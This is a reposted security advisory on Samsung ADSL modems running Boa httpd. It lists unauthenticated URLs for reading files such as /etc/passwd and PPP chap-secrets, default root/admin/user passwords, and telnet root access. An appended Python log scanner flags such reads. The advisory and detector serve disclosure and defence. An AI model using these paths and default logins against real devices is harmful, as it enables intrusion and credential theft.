
[Repost] Samsung ADSL Modem Vulnerability

  Source: morning_wood_at_zone-h.org

Samsung Electronics
http://www.samsung.com

DETAILS
=======
1. Arbitrary reading of files
2. Default root password
3. root file system access

Known issues exist in Boa httpd as per:
FreeBSD-SA-00:60 Security Advisory

http://www.securiteam.com/unixfocus/6G0081P0AI.html and
http://lists.insecure.org/lists/bugtraq/2000/Oct/0445.html

note:
This is a hardware-based product with a built-in httpd for
remote access. This is a separate issue from the ones
formally presented above, but it carries the same implications.

Identification:
HTTP/1.0 400 Bad Request
Date: Sat, 03 Jan 1970 17:57:18 GMT
Server: Boa/0.93.15
Connection: close
Content-Type: text/html

Modem vendor Samsung Electronics (co) modem
co chipset vendor b500545354430002
cpe chipset vendor Samsung Electronics (co) cpe chipset
software version SMDK8947v1.2 Jul 11 2003 10:00:01
ADSL DMT version a-110.030620-10130710

Samsung ADSL modems run uClinux OS
http://www.uclinux.com

note:
Depending on the implementation, other products
using a combination of Boa / uClinux may be
affected as well.

Item 1
=====
http://[someSamsung.ip]/etc/passwd
http://[someSamsung.ip]/etc/hosts
http://[someSamsung.ip]/bin/
http://[someSamsung.ip]/dev/
http://[someSamsung.ip]/lib/
http://[someSamsung.ip]/tmp/

http://[someSamsung.ip]/var/ppp/chap-secrets

http://[someSamsung.ip]/bin/sh

Any remote user may request any file present
in the router/modem OS file system.
Files can be fetched unauthenticated via a
GET request in a browser.

Item 2
=====
Default user logins / passwords exist on both the
httpd (http://[host]/cgi-bin/adsl.cgi) and telnet ports

root/root
admin/admin
user/user

Item 3
======
By telnetting to the device and logging in as
root/root, remote users may access the filesystem.
The modem provides 256mb of RAM for OS and
file system operations. In this implementation
there is approx. 120mb of free file system space,
which allows for the possibility of remote
attackers using the file system for malicious
communication and file storage. This allows
many scenarios, such as storing a worm and/or
viral code.

#echo "some bad data" >file

SOLUTION:
=========
none to date
Samsung has been contacted
No patch released

Credits
=======
This vulnerability was discovered and researched by
Donnie Werner of exploitlabs
Donnie Werner
mail: morning_wood_at_zone-h.org
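
To spot the unauthenticated file reads described in Item 1, the following added example (not part of the original advisory) scans HTTP access logs for successful requests into the OS directories the advisory lists. It assumes Common Log Format lines from a proxy or sensor placed in front of the modem's management interface; the function names and the sample lines are constructed for illustration.

```python
import posixpath
import re
from urllib.parse import unquote

# Top-level directories from the request list in Item 1 of the advisory.
OS_DIRS = {"etc", "bin", "dev", "lib", "tmp", "var"}

# Assumed layout: Common Log Format, as written by a proxy or sensor in
# front of the modem's management interface.
CLF = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target):
    """Drop the query, decode %xx once, collapse //, ./ and ../ segments."""
    path = unquote(target.split("?", 1)[0])
    return posixpath.normpath("/" + path.lstrip("/"))

def flag_fs_reads(lines):
    """Return (src, path, status) for 2xx GET/HEAD requests into OS_DIRS."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m or m["method"] not in ("GET", "HEAD"):
            continue
        path = normalize(m["target"])
        if path.split("/")[1] in OS_DIRS and m["status"].startswith("2"):
            hits.append((m["src"], path, int(m["status"])))
    return hits

# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE = [
    '198.51.100.7 - - [03/Jan/2004:10:00:01 +0000] "GET /etc/passwd HTTP/1.0" 200 312',
    '198.51.100.7 - - [03/Jan/2004:10:00:02 +0000] "GET /cgi-bin/../var/ppp/chap-secrets HTTP/1.0" 200 88',
    '198.51.100.7 - - [03/Jan/2004:10:00:03 +0000] "GET /%65tc//hosts HTTP/1.0" 200 40',
    '192.0.2.10 - - [03/Jan/2004:10:05:00 +0000] "GET /cgi-bin/adsl.cgi HTTP/1.0" 401 0',
    '192.0.2.10 - - [03/Jan/2004:10:05:01 +0000] "GET /bin/sh HTTP/1.0" 404 0',
]

if __name__ == "__main__":
    for src, path, status in flag_fs_reads(SAMPLE):
        print(f"{src} read {path} ({status})")
```

Normalizing before matching keeps encoded or dot-segment variants of the same path from slipping past the directory check.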